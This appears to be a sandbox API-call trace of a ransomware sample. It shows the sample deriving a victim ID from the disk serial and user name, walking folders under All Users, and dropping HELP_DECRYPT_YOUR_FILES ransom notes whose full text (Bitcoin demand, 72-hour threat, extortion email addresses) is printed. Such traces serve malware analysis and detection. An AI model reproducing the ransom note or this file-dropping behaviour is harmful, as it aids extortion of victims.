	[0178.690] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0178.690] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.690] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0178.691] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0178.692] CreateFileW (lpFileName="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\softwaredistribution\\postrebooteventcache.v2\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0178.692] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0178.692] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0178.692] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0178.692] CloseHandle (hObject=0x384) returned 1
	[0178.693] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0178.693] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0178.693] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0178.693] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2\\HELP_DECRYPT_YOUR_FILES.HTML") returned 92
	[0178.693] CreateFileW (lpFileName="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\softwaredistribution\\postrebooteventcache.v2\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0178.694] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0178.694] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0178.696] CloseHandle (hObject=0x384) returned 1
	[0178.697] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0178.697] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0178.697] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.698] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0178.699] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0178.699] CreateFileW (lpFileName="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\softwaredistribution\\postrebooteventcache.v2\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0178.699] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0178.699] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0178.699] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0178.700] CloseHandle (hObject=0x384) returned 1
	[0178.700] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2\\*.*" (normalized: "c:\\users\\all users\\softwaredistribution\\postrebooteventcache.v2\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc06c451e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xc06c451e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x840a7912, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0178.700] lstrlenW (lpString="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2\\*.*") returned 67
	[0178.700] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0178.700] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\SoftwareDistribution\\PostRebootEventCache.V2\\*.*", cchLength=0x43 | out: lpsz="c:\\users\\all users\\softwaredistribution\\postrebooteventcache.v2\\*.*") returned 0x43
	[0178.700] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.701] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\postrebooteventcache.v2\\*.*", lpSrch="windows") returned 0x0
	[0178.701] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.701] StrStrW (lpFirst="c:\\users\\all users\\softwaredistribution\\postrebooteventcache.v2\\*.*", lpSrch="boot") returned="booteventcache.v2\\*.*"
	[0178.701] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0178.701] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc06c451e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xc06c451e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xc06c451e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PostRebootEventCache.V2", cAlternateFileName="POSTRE~1.V2")) returned 0
	[0178.701] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0178.701] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0178.702] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1
	[0178.702] lstrcmpW (lpString1="Start Menu", lpString2="..") returned 1
	[0178.702] lstrcmpW (lpString1="Start Menu", lpString2=".") returned 1
	[0178.702] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\All Users" | out: lpString1="C:\\Users\\All Users") returned="C:\\Users\\All Users"
	[0178.702] lstrcatW (in: lpString1="C:\\Users\\All Users", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\") returned="C:\\Users\\All Users\\"
	[0178.702] lstrcatW (in: lpString1="C:\\Users\\All Users\\", lpString2="Start Menu" | out: lpString1="C:\\Users\\All Users\\Start Menu") returned="C:\\Users\\All Users\\Start Menu"
	[0178.702] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\All Users\\Start Menu" | out: lpString1="C:\\Users\\All Users\\Start Menu") returned="C:\\Users\\All Users\\Start Menu"
	[0178.703] lstrcatW (in: lpString1="C:\\Users\\All Users\\Start Menu", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Start Menu\\") returned="C:\\Users\\All Users\\Start Menu\\"
	[0178.703] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\All Users\\Start Menu\\" | out: lpString1="C:\\Users\\All Users\\Start Menu\\") returned="C:\\Users\\All Users\\Start Menu\\"
	[0178.703] lstrcatW (in: lpString1="C:\\Users\\All Users\\Start Menu\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Start Menu\\*.*") returned="C:\\Users\\All Users\\Start Menu\\*.*"
	[0178.703] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Start Menu\\*.*" (normalized: "c:\\users\\all users\\start menu\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc06c451e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xc06c451e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xc06c451e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PostRebootEventCache.V2", cAlternateFileName="POSTRE~1.V2")) returned 0xffffffff
	[0178.709] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0178.709] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\All Users\\Start Menu" | out: lpString1="C:\\Users\\All Users\\Start Menu") returned="C:\\Users\\All Users\\Start Menu"
	[0178.709] lstrcatW (in: lpString1="C:\\Users\\All Users\\Start Menu", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Start Menu\\*.*") returned="C:\\Users\\All Users\\Start Menu\\*.*"
	[0178.709] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0178.709] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0178.709] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Start Menu\\HELP_DECRYPT_YOUR_FILES.TXT") returned 57
	[0178.709] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\start menu\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0178.733] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0178.733] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0178.736] CloseHandle (hObject=0x380) returned 1
	[0178.748] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0178.748] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.754] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0178.755] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0178.755] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\start menu\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0178.756] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0178.756] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0178.756] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0178.756] CloseHandle (hObject=0x380) returned 1
	[0178.757] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0178.757] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0178.757] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0178.757] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Start Menu\\HELP_DECRYPT_YOUR_FILES.HTML") returned 58
	[0178.758] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\start menu\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0178.767] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0178.767] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0178.770] CloseHandle (hObject=0x380) returned 1
	[0178.771] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0178.771] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0178.772] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.772] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0178.778] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0178.778] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\start menu\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0178.778] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0178.779] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0178.779] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0178.779] CloseHandle (hObject=0x380) returned 1
	[0178.779] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Start Menu\\*.*" (normalized: "c:\\users\\all users\\start menu\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc06c451e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xc06c451e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xc06c451e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PostRebootEventCache.V2", cAlternateFileName="POSTRE~1.V2")) returned 0xffffffff
	[0178.779] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0178.780] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1
	[0178.780] lstrcmpW (lpString1="Templates", lpString2="..") returned 1
	[0178.780] lstrcmpW (lpString1="Templates", lpString2=".") returned 1
	[0178.780] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\All Users" | out: lpString1="C:\\Users\\All Users") returned="C:\\Users\\All Users"
	[0178.780] lstrcatW (in: lpString1="C:\\Users\\All Users", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\") returned="C:\\Users\\All Users\\"
	[0178.780] lstrcatW (in: lpString1="C:\\Users\\All Users\\", lpString2="Templates" | out: lpString1="C:\\Users\\All Users\\Templates") returned="C:\\Users\\All Users\\Templates"
	[0178.780] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\All Users\\Templates" | out: lpString1="C:\\Users\\All Users\\Templates") returned="C:\\Users\\All Users\\Templates"
	[0178.780] lstrcatW (in: lpString1="C:\\Users\\All Users\\Templates", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Templates\\") returned="C:\\Users\\All Users\\Templates\\"
	[0178.780] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\All Users\\Templates\\" | out: lpString1="C:\\Users\\All Users\\Templates\\") returned="C:\\Users\\All Users\\Templates\\"
	[0178.781] lstrcatW (in: lpString1="C:\\Users\\All Users\\Templates\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Templates\\*.*") returned="C:\\Users\\All Users\\Templates\\*.*"
	[0178.781] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Templates\\*.*" (normalized: "c:\\users\\all users\\templates\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc06c451e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xc06c451e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xc06c451e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PostRebootEventCache.V2", cAlternateFileName="POSTRE~1.V2")) returned 0xffffffff
	[0178.781] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0178.781] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\All Users\\Templates" | out: lpString1="C:\\Users\\All Users\\Templates") returned="C:\\Users\\All Users\\Templates"
	[0178.781] lstrcatW (in: lpString1="C:\\Users\\All Users\\Templates", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Templates\\*.*") returned="C:\\Users\\All Users\\Templates\\*.*"
	[0178.781] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0178.781] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0178.781] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Templates\\HELP_DECRYPT_YOUR_FILES.TXT") returned 56
	[0178.783] CreateFileW (lpFileName="C:\\Users\\All Users\\Templates\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\templates\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0178.783] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0178.783] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0178.786] CloseHandle (hObject=0x380) returned 1
